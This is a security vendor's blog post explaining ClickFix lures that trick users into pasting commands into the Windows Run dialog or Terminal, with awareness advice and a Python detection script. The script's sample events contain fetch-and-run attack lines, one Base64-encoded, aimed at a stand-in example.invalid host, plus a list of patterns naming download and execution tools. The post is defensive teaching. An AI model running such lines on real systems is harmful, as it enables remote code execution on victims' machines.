Cybersecurity 101: A Whole New World of Malware Delivery (Clickfix)

Michael DeNapoli
March 2, 2026

Many customers have asked us here at Pondurance what "ClickFix" is and how they can protect their organizations against it. This relatively new form of a known malware-delivery technique is becoming extremely popular, so let's dig into it and see what you can do.


What is ClickFix?


ClickFix is a form of threat activity that tricks a user into running commands on their own device, giving a threat actor access to the system, to credentials, or to other sensitive data. Unlike more traditional phishing or malware, which try to get the user to log into a fake site or run an application, ClickFix tries to get the victim to execute commands or scripts directly, by claiming they must perform some action that does not involve opening a file or running an application.


Most commonly, the user reaches the lure in one of three ways: they visit a website that a threat actor has compromised, they mis-type a URL and land on a fake site the threat actor has set up at the misspelled domain, or a phishing email is delivered to their mailbox. In all three cases, once the user loads the web page or opens the email, a pop-up message (within the browser) tells the user that there is a problem with their machine, with their access to the site, or some other issue that they must fix (hence the "fix" part of the name). In some cases the message is displayed directly on the web page or in the email text and no pop-up is used. Common attack messages claim that the user's internet connection is malfunctioning, that a virus has been detected on their computer, or that the owner of the website requires additional verification before they are permitted to view it. The last format has become extremely popular on compromised and/or fake adult content websites, since several countries either have implemented, or are about to implement, age verification before a visitor can view the website itself. Messages indicating "machine verification" or similar ruses are also common across a wide variety of websites and services.


Instead of instructing a user to download a file (or attempting to start the download automatically), ClickFix attacks tell the user that they must perform a "Repair" or "Review" process in order to gain access to the site. Lots of other words are used, but most begin with an "R" to make the next step sound legitimate. To perform the repair/review/etc., the user is instructed to copy a string of text from a special "verification" or "diagnostic" message (in some cases the page copies the text to the clipboard automatically), then press WindowsKey+R on Windows, paste the text into the system prompt that this brings up, and hit Enter. What this does is bring up the Windows "Run Command" prompt (WIN+R), and the string of text is actually a set of commands/scripts that run on the user's machine once they press Enter. For most users, being told they need to repair or review something with WIN+R seems to make sense.


The commands vary depending on the attack:


  • Some force the system to download and run malware from an online location without using a browser.

  • Others run commands directly on the machine which steal information like login credentials and other sensitive data.

  • Newer variants leverage encoding schemes built into most Operating Systems (OS) to make the commands look like a random string of garbage - but when sent through the Run Command, the string is decoded into the attack commands/scripts and run.


For example, the string "dGhpcyBzdHJpbmcgb2YgdGV4dCBjb3VsZCBiZSBtYWxpY2lvdXM=" in Base64 decodes to "this string of text could be malicious", but the user would only see the garbled text, not the actual message/commands. Once tools in the OS decode the message, it turns back into its original form and can be executed as a command or script.


Is it Only Windows? 


While Windows has seen the most ClickFix activity in recent times, macOS and Linux are not immune. On those two operating systems, the victim is shown a message saying they must open the Terminal application (which is part of the OS itself) and paste the string of text into that app. On macOS we've also seen attacks trying to trick a user into dragging and dropping a file of scripts directly onto the Terminal application - usually in the guise of installing an application that they thought was legitimate but is in fact malware. Since it is not unusual for legitimate applications to instruct the user to drag a downloaded file onto the icon for the Applications folder, the social engineering trick of simply switching what they drop the file onto works unfortunately well.


The end result is the same: malicious commands/scripts are run on the victim's machine, and the threat actor gains valuable information, installs other malware, gains access to the machine, or all three. So regardless of which operating systems you use in your organization, this is a threat you need to be aware of.
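The command variants and Base64 encoding described in the previous section, together with the macOS/Linux Terminal variant above, can be turned into a simple triage check on process-creation telemetry of the kind an EDR or Sysmon-style sensor records. The Python script below is an added example written for this article; it is not Pondurance code and not part of any product. The sample events, the example.invalid hostnames, the pattern list and the alert threshold are constructed assumptions for illustration. It flags shells launched from an interactive parent (explorer.exe on Windows, Terminal on macOS), scans the command line for download, dynamic-execution and encoding traits, and decodes long Base64 runs (including PowerShell's UTF-16LE -EncodedCommand form) so the plaintext can be scanned too.

```python
"""Triage of process-creation events for ClickFix-style pastes (constructed example)."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Interpreters that a Run-dialog (WIN+R) or Terminal paste typically lands in.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "bash", "sh", "zsh"}
# Parents that mean "a person typed or pasted this", not a service or scheduled task.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}
# Command-line traits the article describes: remote fetch, dynamic execution, encoding.
SUSPICIOUS_PATTERNS = [
    (r"(?i)\b(iwr|invoke-webrequest|curl|wget|bitsadmin|certutil)\b", "remote download"),
    (r"(?i)\b(iex|invoke-expression)\b", "dynamic execution"),
    (r"(?i)(?:^|\s)-e\w*\s+[A-Za-z0-9+/=]{16,}", "encoded command"),
    (r"(?i)\bbase64\s+(-d|--decode)\b", "base64 decode"),
    (r"\|\s*(bash|sh|zsh)\b", "pipe to shell"),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
ALERT_THRESHOLD = 2  # assumption: a bare interactive shell launch is logged, not alerted


@dataclass
class ProcessEvent:
    parent: str        # parent image name, e.g. "explorer.exe"
    image: str         # launched image name, e.g. "powershell.exe"
    command_line: str


@dataclass
class Finding:
    reasons: list = field(default_factory=list)
    decoded: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def decode_b64(token: str) -> Optional[str]:
    """Decode a Base64 token to text, or return None if it is not text.

    PowerShell's -EncodedCommand is UTF-16LE, so ASCII shows up with a NUL after each byte.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    encoding = "utf-16le" if len(raw) >= 2 and raw[1] == 0 else "utf-8"
    try:
        text = raw.decode(encoding)
    except UnicodeDecodeError:
        return None
    # Random binary that happens to decode is not a pasted command; require mostly printable text.
    printable = sum(ch.isprintable() or ch.isspace() for ch in text)
    return text if text and printable / len(text) > 0.9 else None


def _scan(text: str, prefix: str = "") -> list:
    return [prefix + label for pattern, label in SUSPICIOUS_PATTERNS if re.search(pattern, text)]


def triage(event: ProcessEvent) -> Optional[Finding]:
    """Return a Finding for events that look like a pasted ClickFix command, else None."""
    finding = Finding()
    if event.image.lower() in SHELL_IMAGES and event.parent.lower() in INTERACTIVE_PARENTS:
        finding.reasons.append(f"interactive shell launch from {event.parent}")
    finding.reasons.extend(_scan(event.command_line))
    # Look through the encoding layer: decode long Base64 runs and scan the plaintext too.
    for token in B64_TOKEN.findall(event.command_line):
        text = decode_b64(token)
        if text:
            finding.decoded.append(text)
            finding.reasons.extend(_scan(text, prefix="(decoded) "))
    return finding if finding.reasons else None


# Constructed sample events; example.invalid is a reserved, non-routable name.
_ENC = base64.b64encode("iex (iwr http://example.invalid/verify)".encode("utf-16le")).decode()
SAMPLE_EVENTS = {
    "win_run_dialog": ProcessEvent("explorer.exe", "powershell.exe", f"powershell.exe -w hidden -enc {_ENC}"),
    "mac_terminal": ProcessEvent("Terminal", "bash", 'bash -c "curl -fsSL http://example.invalid/fix.sh | bash"'),
    "win_scheduled": ProcessEvent("services.exe", "powershell.exe", r"powershell.exe -File C:\scripts\inventory.ps1"),
    "win_ipconfig": ProcessEvent("explorer.exe", "cmd.exe", "cmd.exe /c ipconfig /all"),
}


def alerts(events: dict) -> dict:
    """Map event name -> Finding for every event scoring at or above ALERT_THRESHOLD."""
    out = {}
    for name, event in events.items():
        finding = triage(event)
        if finding and finding.score >= ALERT_THRESHOLD:
            out[name] = finding
    return out


if __name__ == "__main__":
    for name, finding in alerts(SAMPLE_EVENTS).items():
        print(f"{name}: score={finding.score} reasons={finding.reasons} decoded={finding.decoded}")
```

Run the script directly to print the alerts. The scheduled-task event produces no finding at all and the ipconfig launch scores below the threshold, which is the point of the scoring: a Run-dialog launch on its own is worth logging but not alerting on, while one that carries an encoded or remote-download payload is. The decoding step matters because the visible command line of an encoded variant contains none of the words a plain keyword rule would look for.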


Haven't I Seen This Before?


ClickFix isn't brand new; the attack was first spotted and named in early 2024. Back then, threat actors tried to trick a user into opening a specially-crafted Office document (Word, Excel, etc.) which contained the malicious commands and scripting. The "bait" was the same - the user needed to review the instructions in the document in order to perform some necessary action - and the outcome was the same as well. Using documents to launch the attack became harder and harder as Endpoint Detection and Response (EDR) platforms, operating systems, other cybersecurity tools, and Office itself became better at recognizing the attack and blocking it. As most malware threat actors do, they adapted and found new ways to get the job done, leading to the current generation of ClickFix that doesn't require documents at all - especially on Windows.


How Can ClickFix Be Stopped?


In the case of ClickFix, there are a few things that can be done to stop an attacker from successfully using the technique. Security tools like EDR/anti-malware are getting better at detecting ClickFix - but traditional anti-virus (which only looks at the content of files written to disk) won't catch it, because nothing has to be downloaded as a file. So upgrading to an EDR is a good idea, especially because it brings a significant number of other security benefits with it. EDRs can't stop every type of ClickFix attack, however - so EDR alone is not enough.


The most powerful tool at our disposal is user awareness training. Users do not have to become cybersecurity experts to defend the organization from ClickFix, as spotting it is easy enough for even non-technical folks to do successfully.


First, no user should use the Run Command in Windows (WIN+R) unless the organization's IT staff specifically tells them to do so, and not via email - IT staff should be telling them personally, by phone. Users should never use it when prompted by a website or email message, under any circumstances. While it is possible to disable WIN+R completely, doing so requires Group Policy Objects in either Active Directory or Entra ID and also requires that all devices be managed by AD or Entra - so that might not be an option for every organization. Making users aware that WIN+R is not a repair tool and shouldn't be used unless they're in active contact with IT is a good safeguard.


Next, regardless of what OS the user has on their device, they should never drag and drop a file onto a Command Prompt window (cmd.exe), a PowerShell window, or the Terminal app (macOS and Linux). While these tools exist for valid reasons, they are not something users will have to work with on a regular basis unless they are IT, cybersecurity, or developer staff. As with WIN+R, any user asked to do this type of operation should only do so when in direct communication (by phone) with IT staff.


Finally, if any website, email, or anything else tells a user to do either of those things, they should close their browser and immediately contact the organization's IT or cybersecurity team. Refusing to follow the ClickFix instructions will prevent the attacker from actually compromising the device, but it is vital that the technology staff know it happened and follow up to be sure nothing went wrong.


That last one can be embarrassing for some users, as they may have encountered the ClickFix message while surfing websites that are against company policy (adult content, gambling, etc.), but it is vital that they report it anyway. Make it well known and understood that no one will get fired for reporting a ClickFix website; the only way to get in trouble is for the company to find out they went to that site and didn't report it to IT. This has a double benefit: it lets the IT team keep the organization safe, and it drastically cuts down on users going to inappropriate sites on company devices, since they'll think twice before taking the chance that they see ClickFix and have to admit what site they visited.


In summary, security controls can stem the tide of ClickFix attacks to no small degree, but they cannot eliminate them entirely. User awareness is key, and is every bit as effective at stopping ClickFix, because it removes a component the attack cannot work without: the human factor.

About the Author:


Michael DeNapoli is a seasoned Senior Solutions Architect with more than 25 years of experience in cybersecurity, solution architecture, and enterprise systems design. Throughout his career, he has led technical strategy, security architecture, and advanced solution development for organizations ranging from emerging security vendors to global enterprises. Michael’s expertise spans cybersecurity operations, cloud architecture, technical sales leadership, security posture management, and identity protection, with a proven track record of guiding clients through complex technology challenges. Today, he brings his deep industry knowledge to Pondurance as a Senior Solutions Architect, helping organizations strengthen their security foundations with clarity and confidence.
